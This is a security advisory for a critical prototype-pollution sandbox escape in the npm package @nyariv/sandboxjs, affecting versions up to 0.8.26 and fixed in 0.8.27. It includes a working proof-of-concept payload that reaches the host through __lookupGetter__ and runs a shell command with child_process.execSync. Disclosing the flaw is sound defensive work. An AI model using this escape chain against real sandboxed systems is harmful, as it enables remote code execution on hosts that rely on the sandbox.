GHSA-9p4w-fq8m-2hp7

Suggest an improvement
Source
https://github.com/advisories/GHSA-9p4w-fq8m-2hp7
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-9p4w-fq8m-2hp7/GHSA-9p4w-fq8m-2hp7.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-9p4w-fq8m-2hp7
Aliases
Published
2026-02-02T20:17:39Z
Modified
2026-02-18T23:56:45Z
Severity
  • 10.0 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
Summary
SandboxJS Vulnerable to Prototype Pollution -> Sandbox Escape -> RCE
Details

Summary

SandboxJS does not properly restrict __lookupGetter__ which can be used to obtain prototypes, which can be used for escaping the sandbox / remote code execution.

Details

https://github.com/nyariv/SandboxJS/blob/f212a38fb5a6d4bc2bc2e2466c0c011ce8d41072/src/executor.ts#L368-L398

The Object prototype which contains __lookupGetter__ is properly protected, but the special case for accessing function properties bypasses the prototype chain checks including the root Object prototype.

PoC

const s = require("@nyariv/sandboxjs").default;
const sb = new s();

payload = `
let getProto = Object.toString.__lookupGetter__("__proto__")
let m = getProto.call(new Map());
m.has = isFinite;

console.log(
  isFinite.constructor(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);`
sb.compile(payload)().run();

Impact

Prototype Pollution -> RCE

Database specific
{
    "cwe_ids":  [
        "CWE-1321",
        "CWE-94"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2026-02-02T20:17:39Z",
    "nvd_published_at":  "2026-02-02T23:16:09Z",
    "severity":  "CRITICAL"
}
References

Affected packages

npm / @nyariv/sandboxjs

Package

Name
@nyariv/sandboxjs
View open source insights on deps.dev
Purl
pkg:npm/%40nyariv/sandboxjs

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
0.8.27

Database specific

last_known_affected_version_range
"<= 0.8.26"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-9p4w-fq8m-2hp7/GHSA-9p4w-fq8m-2hp7.json"